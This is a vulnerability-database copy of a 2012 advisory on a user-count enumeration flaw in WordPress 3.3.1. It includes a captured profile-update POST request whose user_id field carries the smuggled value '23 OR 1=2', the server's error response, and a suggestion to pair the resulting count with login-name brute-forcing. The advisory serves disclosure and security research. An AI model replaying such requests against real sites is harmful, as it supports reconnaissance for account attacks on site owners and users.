Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress 3.3.1 User Count Enumeration

🗓️ 11 Mar 2012 00:00:00Reported by HauntITType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 28 Views

WordPress 3.3.1 User Count Enumeration Vulnerability in Number of Registered Users Retrieval via HTTP POS

Code
`# TITLE ....... # Wordpress 3.3.1 - users counter ..................... #  
# DATE ........ # 15.02.2012 .......................................... #  
# AUTOHR ...... # http://hauntit.blogspot.com ......................... #  
# SOFT LINK ... # http://wordpress.org................................. #  
# VERSION ..... # 3.3.1 ............................................... #  
# TESTED ON ... # LAMP ................................................ #  
# ..................................................................... #  
  
# 1. What is this?  
# 2. What is the type of vulnerability?  
# 3. Where is bug :)  
# 4. More...  
  
#............................................#  
# 1. What is this?  
This is very nice CMS, You should try it! ;)  
  
# 2. What is the type of vulnerability?  
This is very crazy bug, because, we can not enumerate _names_ of users.  
We can't get a "information-disclosure"-kind of bug.  
One think we can do using this bug is getting to know  
what is the number of users in Wordpress. ;)  
  
Number of users (in webapp) can be used, to determine:  
- how "popular" is this WP-site (by "popular" I mean, how many users are registered in this site);  
- can be used, when You're bruteforcing names in WP.   
Here, if we can get 'number of users', we can do other thing:  
now we know that: (for example) in webapplication we have 10 users.  
When we get number of users, we can determine next attack: bruteforce to enumerate their (users) names.  
So, when doing this, we have some kind of 'default login list' file for bruteforce.  
Via this file, bruteforcing-progress tells us, that (from logins.txt) we find out 7 names.  
So connecting this information with information from our bug - we can know, that  
in webapplication is 3 more names(users) to 'get'.  
  
I tested this vulnerability for registered user. Role for him was subscriber (so "the lowest" of registered users).  
  
# 3. Where is bug :)  
Here I'll present some BurpProxy traffic dump:  
  
...cut...  
POST /www/Wordpress/wordpress/wp-admin/profile.php HTTP/1.1  
Host: localhost  
(...)  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 363  
Connection: close  
  
_wpnonce=f175245608&_wp_http_referer=%2Fwww%2FWordpress%2Fwordpress%2Fwp-admin%2Fprofile.php&from=profile&checkuser_id=2&admin_color=fresh&admin_bar_front=1&first_name=tester&last_name=tester&nickname=tester&display_name=tester&email=tester%40tester.com&url=&aim=&yim=&jabber=&description=&pass1=&pass2=&action=update&user_id=23 OR 1=2&submit=Update+Profile  
...cut...*  
  
If this user_id exists, we'll get an information that:  
- we can not edit this user/profile  
- we can edit this user/profile (here won't be info like "now You can change other users";). If   
we have permmitions here to change (others), we will change it (no warning or other "communicate" here)  
  
If there is not user_id = (our intiger), than Wordpress tell us:  
...cut...  
HTTP/1.1 500 Internal Server Error  
Date: Wed, 15 Feb 2012 23:34:34 GMT  
Server: Apache/2.2.17 (Ubuntu)  
X-Powered-By: PHP/5.3.5-1ubuntu7.7  
Expires: Wed, 11 Jan 1984 05:00:00 GMT  
Last-Modified: Wed, 15 Feb 2012 23:34:35 GMT  
Cache-Control: no-cache, must-revalidate, max-age=0  
Pragma: no-cache  
X-Frame-Options: SAMEORIGIN  
Vary: Accept-Encoding  
Connection: close  
Content-Type: text/html; charset=utf-8  
Content-Length: 2923  
  
<!DOCTYPE html>  
<!-- Ticket #11289, IE bug fix:(...) -->  
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  
<title>WordPress &rsaquo; Error</title>  
<style type="text/css">  
(...)  
  
</style>  
</head>  
<body id="error-page">  
<p>Invalid user ID.</p></body>  
</html>  
  
  
...cut...  
  
So now by bruteforcing numbers with this HTTP POST, authenticated (normal registered) user  
can find out how many users is in the application.  
  
# 4. More...  
  
- http://www.wordpress.org  
- http://hauntit.blogspot.com  
- http://www.google.com  
- http://portswigger.net  
  
# Best regards  
#   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Mar 2012 00:00Current
7.4High risk
Vulners AI Score7.4
information disclosure buguser enumerationwordpress 3.3.1
28